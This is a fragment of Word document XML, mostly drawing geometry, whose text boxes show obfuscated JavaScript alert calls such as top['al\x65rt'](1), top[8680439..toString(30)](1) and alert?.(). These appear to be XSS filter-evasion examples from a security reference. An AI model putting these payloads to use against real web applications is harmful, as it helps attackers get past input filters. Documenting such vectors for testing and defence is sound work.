                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 2693 2672"/>
                              <a:gd name="T35" fmla="*/ 2693 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 2833 2672"/>
                              <a:gd name="T39" fmla="*/ 2833 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 2854 2672"/>
                              <a:gd name="T43" fmla="*/ 2854 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580"/>
                              <a:gd name="T46" fmla="+- 0 2854 2672"/>
                              <a:gd name="T47" fmla="*/ 285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80" h="183">
                                <a:moveTo>
                                  <a:pt x="1559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1559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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2672"/>
                            <a:ext cx="158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 w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>top[‘al\x65rt’](1)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2295" style="position:absolute;margin-left:96.5pt;margin-top:133.6pt;width:79pt;height:9.15pt;z-index:-15449088;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2672" coordsize="1580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">
                <v:shape id="Freeform 18" o:spid="_x0000_s2296" style="position:absolute;left:1930;top:2672;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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Tiub8A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflhG81Y0WpEQ3obQUehM13sfsNAnN&#10;zsbdaYz/3i0UepvH+5xtOblejRRi59nAcpGBIq697bgxUB0/nl5ARUG22HsmAzeKUBaPD1vMrb/y&#10;nsaDNCqFcMzRQCsy5FrHuiWHceEH4sR9+eBQEgyNtgGvKdz1epVla+2w49TQ4kBvLdXfhx9nIKzE&#10;n5+Hnezw1L2Puroc6+pizHw2vW5ACU3yL/5zf9o0fw2/v6QDdHE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ROK5vwAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m1559,182l21,182r-3,l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,21l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,2854;21,2854;18,2854;0,2833;0,2830;0,2693;21,2672;1559,2672;1580,2693;1580,2833;1562,2854;1559,2854" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 17" o:spid="_x0000_s2297" type="#_x0000_t202" style="position:absolute;left:1930;top:2672;width:1580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A6w8EA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgh7W1M9uLvVKCIKwoJY68Hj2Ixt&#10;sJnUJmr99xthYW/zeJ8znXe2FndqvXGsYDhIQBAXThsuFRzy9ccXCB+QNdaOScGTPMxnvbcppto9&#10;OKP7PpQihrBPUUEVQpNK6YuKLPqBa4gjd3atxRBhW0rd4iOG21qOkmQsLRqODRU2tKyouOxvVsHi&#10;yNnKXLenXXbOTJ5/J/wzvij13u8WExCBuvAv/nNvdJz/Ca9f4gFy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QOsPBAAAA2w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 w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>top[‘al\x65rt’](1)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67904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1966595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="14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3146 3097"/>
                            <a:gd name="T3" fmla="*/ 3146 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3146 3097"/>
                            <a:gd name="T7" fmla="*/ 3146 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3145 3097"/>
                            <a:gd name="T11" fmla="*/ 3145 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3125 3097"/>
                            <a:gd name="T15" fmla="*/ 3125 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3118 3097"/>
                            <a:gd name="T19" fmla="*/ 3118 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3097 3097"/>
                            <a:gd name="T23" fmla="*/ 3097 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3097 3097"/>
                            <a:gd name="T27" fmla="*/ 3097 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3122 3097"/>
                            <a:gd name="T31" fmla="*/ 3122 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3125 3097"/>
                            <a:gd name="T35" fmla="*/ 3125 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3146 3097"/>
                            <a:gd name="T39" fmla="*/ 314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5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5F41A" id="Freeform 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:154.85pt;width:2.45pt;height:2.45pt;z-index:-15448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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1997710;13335,1997710;11430,1997075;0,1984375;0,1979930;13335,1966595;17780,1966595;31115,1982470;31115,1984375;17780,199771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68416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1920875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1597660" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1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7660" cy="116205"/>
                          <a:chOff x="1930" y="3025"/>
                          <a:chExt cx="2516" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="12" name="Freeform 14"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3024"/>
                            <a:ext cx="2516" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4424 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 2516"/>
                              <a:gd name="T2" fmla="+- 0 3207 3025"/>
                              <a:gd name="T3" fmla="*/ 3207 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 2516"/>
                              <a:gd name="T6" fmla="+- 0 3207 3025"/>
                              <a:gd name="T7" fmla="*/ 3207 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 2516"/>
                              <a:gd name="T10" fmla="+- 0 3206 3025"/>
                              <a:gd name="T11" fmla="*/ 3206 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 2516"/>
                              <a:gd name="T14" fmla="+- 0 3186 3025"/>
                              <a:gd name="T15" fmla="*/ 3186 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 2516"/>
                              <a:gd name="T18" fmla="+- 0 3182 3025"/>
                              <a:gd name="T19" fmla="*/ 3182 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 2516"/>
                              <a:gd name="T22" fmla="+- 0 3046 3025"/>
                              <a:gd name="T23" fmla="*/ 3046 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 2516"/>
                              <a:gd name="T26" fmla="+- 0 3025 3025"/>
                              <a:gd name="T27" fmla="*/ 3025 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4424 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 2516"/>
                              <a:gd name="T30" fmla="+- 0 3025 3025"/>
                              <a:gd name="T31" fmla="*/ 3025 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4445 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 2516"/>
                              <a:gd name="T34" fmla="+- 0 3046 3025"/>
                              <a:gd name="T35" fmla="*/ 3046 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4445 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 2516"/>
                              <a:gd name="T38" fmla="+- 0 3186 3025"/>
                              <a:gd name="T39" fmla="*/ 3186 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4427 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 2516"/>
                              <a:gd name="T42" fmla="+- 0 3206 3025"/>
                              <a:gd name="T43" fmla="*/ 3206 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4424 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 2516"/>
                              <a:gd name="T46" fmla="+- 0 3207 3025"/>
                              <a:gd name="T47" fmla="*/ 3207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16" h="183">
                                <a:moveTo>
                                  <a:pt x="2494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2494" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2515" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2515" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2497" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2494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024"/>
                            <a:ext cx="251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0"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>top[8680439..toString(30)](1)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2298" style="position:absolute;margin-left:96.5pt;margin-top:151.25pt;width:125.8pt;height:9.15pt;z-index:-15448064;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3025" coordsize="2516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">
                <v:shape id="Freeform 14" o:spid="_x0000_s2299" style="position:absolute;left:1930;top:3024;width:2516;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="251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QBW8AA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPyWrDMBC9F/IPYgq9NXIdCMGJEtJQx702LeQ6WFPZ&#10;xBoZSfXy91Uh0Ns83jq7w2Q7MZAPrWMFL8sMBHHtdMtGwddn+bwBESKyxs4xKZgpwGG/eNhhod3I&#10;HzRcohEphEOBCpoY+0LKUDdkMSxdT5y4b+ctxgS9kdrjmMJtJ/MsW0uLLaeGBns6NVTfLj9WQVk6&#10;c3410zyuKrMpj2+Vv11ZqafH6bgFEWmK/+K7+12n+Tn8/ZIOkP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SQBW8AAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m2494,182l21,182r-3,-1l,161r,-4l,21,21,,2494,r21,21l2515,161r-18,20l2494,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2494,3207;21,3207;18,3206;0,3186;0,3182;0,3046;21,3025;2494,3025;2515,3046;2515,3186;2497,3206;2494,3207" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 13" o:spid="_x0000_s2300" type="#_x0000_t202" style="position:absolute;left:1930;top:3024;width:2516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s8wMEA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1tQV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rPMDBAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=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0"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>top[8680439..toString(30)](1)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6892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2182495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1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3485 3437"/>
                            <a:gd name="T3" fmla="*/ 3485 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3485 3437"/>
                            <a:gd name="T7" fmla="*/ 3485 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3485 3437"/>
                            <a:gd name="T11" fmla="*/ 3485 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3464 3437"/>
                            <a:gd name="T15" fmla="*/ 3464 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3458 3437"/>
                            <a:gd name="T19" fmla="*/ 3458 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3437 3437"/>
                            <a:gd name="T23" fmla="*/ 3437 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3437 3437"/>
                            <a:gd name="T27" fmla="*/ 3437 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3461 3437"/>
                            <a:gd name="T31" fmla="*/ 3461 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3464 3437"/>
                            <a:gd name="T35" fmla="*/ 3464 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3485 3437"/>
                            <a:gd name="T39" fmla="*/ 3485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8"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="48"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="48"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="27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7"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="28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372E35" id="Freeform 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:171.85pt;width:2.45pt;height:2.45pt;z-index:-15447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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2212975;13335,2212975;11430,2212975;0,2199640;0,2195830;13335,2182495;17780,2182495;31115,2197735;31115,2199640;17780,221297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69440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2136140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="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3364"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8" name="Freeform 10"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3363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3546 3364"/>
                              <a:gd name="T3" fmla="*/ 3546 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 3546 3364"/>
                              <a:gd name="T7" fmla="*/ 3546 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 3545 3364"/>
                              <a:gd name="T11" fmla="*/ 3545 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 3525 3364"/>
                              <a:gd name="T15" fmla="*/ 3525 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 3522 3364"/>
                              <a:gd name="T19" fmla="*/ 3522 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 3385 3364"/>
                              <a:gd name="T23" fmla="*/ 3385 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 3364 3364"/>
                              <a:gd name="T27" fmla="*/ 3364 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 3364 3364"/>
                              <a:gd name="T31" fmla="*/ 3364 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 3385 3364"/>
                              <a:gd name="T35" fmla="*/ 3385 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 3525 3364"/>
                              <a:gd name="T39" fmla="*/ 3525 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 3545 3364"/>
                              <a:gd name="T43" fmla="*/ 3545 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 3546 3364"/>
                              <a:gd name="T47" fmla="*/ 3546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1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1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3363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7743" w:rsidRDefault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alert?.()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2301" style="position:absolute;margin-left:96.5pt;margin-top:168.2pt;width:41.35pt;height:9.15pt;z-index:-15447040;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3364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">
                <v:shape id="Freeform 10" o:spid="_x0000_s2302" style="position:absolute;left:1930;top:3363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wapL0A&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbERPuwrCMBTdBf8hXMFFNNVBtBrFB6KDi1XE8dJc22Jz&#10;U5qo9e/NIDgeznu+bEwpXlS7wrKC4SACQZxaXXCm4HLe9ScgnEfWWFomBR9ysFy0W3OMtX3ziV6J&#10;z0QIYRejgtz7KpbSpTkZdANbEQfubmuDPsA6k7rGdwg3pRxF0VgaLDg05FjRJqf0kTyNguN6m013&#10;172/ydFl2nvc1qjTk1LdTrOagfDU+L/45z5oBWFruBJugF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awapL0AAADaAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25yZXYu&#10;eG1sUEsFBgAAAAAEAAQA9QAAAIIDAAAAAA==&#10;" path="m805,182r-784,l18,181,,161r,-3l,21,21,,805,r21,21l826,161r-17,20l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,3546;21,3546;18,3545;0,3525;0,3522;0,3385;21,3364;805,3364;826,3385;826,3525;809,3545;805,3546" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 9" o:spid="_x0000_s2303" type="#_x0000_t202" style="position:absolute;left:1930;top:3363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oFKsIA&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/AWvGmqB9GuUURWEASx1oPHt82z&#10;DTYv3SZq/fdGWNjjMDPfMPNlZ2txp9YbxwpGwwQEceG04VLBKd8MpiB8QNZYOyYFT/KwXHz05phq&#10;9+CM7sdQighhn6KCKoQmldIXFVn0Q9cQR+/iWoshyraUusVHhNtajpNkIi0ajgsVNrSuqLgeb1bB&#10;6szZt/nd/xyyS2byfJbwbnJVqv/Zrb5ABOrCf/ivvdUKZvC+Em+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gUqwgAAANoAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault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alert?.()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6"/>
        <w:rPr>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="464"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="16012288" behindDoc="0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95885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="6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00 151"/>
                            <a:gd name="T3" fmla="*/ 200 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 200 151"/>
                            <a:gd name="T7" fmla="*/ 200 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 199 151"/>
                            <a:gd name="T11" fmla="*/ 199 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 179 151"/>
                            <a:gd name="T15" fmla="*/ 179 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 172 151"/>
                            <a:gd name="T19" fmla="*/ 172 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 151 151"/>
                            <a:gd name="T23" fmla="*/ 151 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 151 151"/>
                            <a:gd name="T27" fmla="*/ 151 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 175 151"/>
                            <a:gd name="T31" fmla="*/ 175 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 179 151"/>
                            <a:gd name="T35" fmla="*/ 179 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 200 151"/>
                            <a:gd name="T39" fmla="*/ 200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5DD3F" id="Freeform 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:7.55pt;width:2.45pt;height:2.45pt;z-index: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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,127000;13335,127000;11430,126365;0,113665;0,109220;13335,95885;17780,95885;31115,111125;31115,113665;17780,127000" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap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485910528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1256665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>49530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="5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120" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 2869 1979"/>
                            <a:gd name="T1" fmla="*/ T0 w 912"/>
                            <a:gd name="T2" fmla="+- 0 260 78"/>
                            <a:gd name="T3" fmla="*/ 260 h 183"/>
                            <a:gd name="T4" fmla="+- 0 2000 1979"/>
                            <a:gd name="T5" fmla="*/ T4 w 912"/>
                            <a:gd name="T6" fmla="+- 0 260 78"/>
                            <a:gd name="T7" fmla="*/ 260 h 183"/>
                            <a:gd name="T8" fmla="+- 0 1997 1979"/>
                            <a:gd name="T9" fmla="*/ T8 w 912"/>
                            <a:gd name="T10" fmla="+- 0 260 78"/>
                            <a:gd name="T11" fmla="*/ 260 h 183"/>
                            <a:gd name="T12" fmla="+- 0 1979 1979"/>
                            <a:gd name="T13" fmla="*/ T12 w 912"/>
                            <a:gd name="T14" fmla="+- 0 239 78"/>
                            <a:gd name="T15" fmla="*/ 239 h 183"/>
                            <a:gd name="T16" fmla="+- 0 1979 1979"/>
                            <a:gd name="T17" fmla="*/ T16 w 912"/>
                            <a:gd name="T18" fmla="+- 0 236 78"/>
                            <a:gd name="T19" fmla="*/ 236 h 183"/>
                            <a:gd name="T20" fmla="+- 0 1979 1979"/>
                            <a:gd name="T21" fmla="*/ T20 w 912"/>
                            <a:gd name="T22" fmla="+- 0 99 78"/>
                            <a:gd name="T23" fmla="*/ 99 h 183"/>
                            <a:gd name="T24" fmla="+- 0 2000 1979"/>
                            <a:gd name="T25" fmla="*/ T24 w 912"/>
                            <a:gd name="T26" fmla="+- 0 78 78"/>
                            <a:gd name="T27" fmla="*/ 78 h 183"/>
                            <a:gd name="T28" fmla="+- 0 2869 1979"/>
                            <a:gd name="T29" fmla="*/ T28 w 912"/>
                            <a:gd name="T30" fmla="+- 0 78 78"/>
                            <a:gd name="T31" fmla="*/ 78 h 183"/>
                            <a:gd name="T32" fmla="+- 0 2890 1979"/>
                            <a:gd name="T33" fmla="*/ T32 w 912"/>
                            <a:gd name="T34" fmla="+- 0 99 78"/>
                            <a:gd name="T35" fmla="*/ 99 h 183"/>
                            <a:gd name="T36" fmla="+- 0 2890 1979"/>
                            <a:gd name="T37" fmla="*/ T36 w 912"/>
                            <a:gd name="T38" fmla="+- 0 239 78"/>
                            <a:gd name="T39" fmla="*/ 239 h 183"/>
                            <a:gd name="T40" fmla="+- 0 2872 1979"/>
                            <a:gd name="T41" fmla="*/ T40 w 912"/>
